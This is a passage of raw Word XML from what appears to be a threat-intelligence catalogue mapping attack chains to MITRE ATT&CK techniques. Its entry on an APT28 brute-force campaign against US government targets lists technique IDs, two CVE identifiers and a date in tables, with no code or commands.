          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1498']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9632BB" w14:textId="5C0153FA" w:rsidR="00605F46" w:rsidRPr="005935F8" w:rsidRDefault="00605F46" w:rsidP="00605F46">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1498 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00605F46">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13481D37" w14:textId="77777777" w:rsidR="004C06A4" w:rsidRDefault="004C06A4" w:rsidP="004C06A4">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc153480848"/>
      <w:r>
        <w:t xml:space="preserve">T1133, T1078.004, T1190 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00A365EB">
        <w:t>Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="00456EC1" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00632139">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632139" w:rsidRPr="002D1D50" w14:paraId="1D4827ED" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02B67F7D" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4599AE" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F258410" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="39C409C3" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7430839D" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04361A0C" w14:textId="0DC1904E" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT28</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A91E327" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="3B3AC676" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B75954" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="007328DE" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04EABD0B" w14:textId="1C8ECEC7" w:rsidR="00632139" w:rsidRPr="007328DE" w:rsidRDefault="00A9269C" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A9269C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A9269C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1078 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A9269C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C62F416" w14:textId="54999D2D" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="003C3F7E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Following T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1133 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> External Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="1561ECFE" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58DC67DF" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A89A909" w14:textId="34D942B8" w:rsidR="00632139" w:rsidRPr="007328DE" w:rsidRDefault="005A6AAC" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E267BA3" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="7608067A" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68CD7867" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D910719" w14:textId="2318AA8C" w:rsidR="00632139" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FCA1157" w14:textId="01E259CE" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="2F7E1F95" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CED684A" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC69D00" w14:textId="1E2151FE" w:rsidR="00632139" w:rsidRDefault="000638E7" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2081D2BB" w14:textId="71B8BA10" w:rsidR="00632139" w:rsidRPr="00387DCC" w:rsidRDefault="000638E7" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="4F70A92A" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="148E7431" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="380C4635" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49EE20E4" w14:textId="56C6DC37" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="4E1E0571" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30167E09" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69EDE793" w14:textId="1113E3F3" w:rsidR="00632139" w:rsidRDefault="00155B94" w:rsidP="00155B94">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2020-0688</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00155B94">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>CVE 2020-17144</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66D9D71B" w14:textId="474FF933" w:rsidR="00632139" w:rsidRDefault="001F175E" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="190E57B6" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C3A9B2" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D521637" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="712AFBE4" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="57E729AA" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E177C9" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54BD282B" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77BAE4C4"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706310E9" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A363F57" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E28CB9D" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E182C2A" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="12CAF2CB" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56479A96" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1402528C" w14:textId="4DF64811" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="000638E7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38258779" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00632139" w:rsidRPr="00B857D7" w14:paraId="1D904FBA" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ED11451" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06050E3E" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B001773" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="444F47D8" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="00AC7A85" w:rsidRDefault="00632139" w:rsidP="00632139"/>
    <w:p w14:paraId="308408EE" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00632139">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408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00632139" w:rsidRPr="002D1D50" w14:paraId="7894C1E7" w14:textId="77777777" w:rsidTr="00151FAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="545755AC" w14:textId="77777777" w:rsidR="00632139" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="357E7EB4" w14:textId="77777777" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00632139" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="50CF835A" w14:textId="1D050C7F" w:rsidR="00632139" w:rsidRPr="002D1D50" w:rsidRDefault="00134938" w:rsidP="00151FAB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
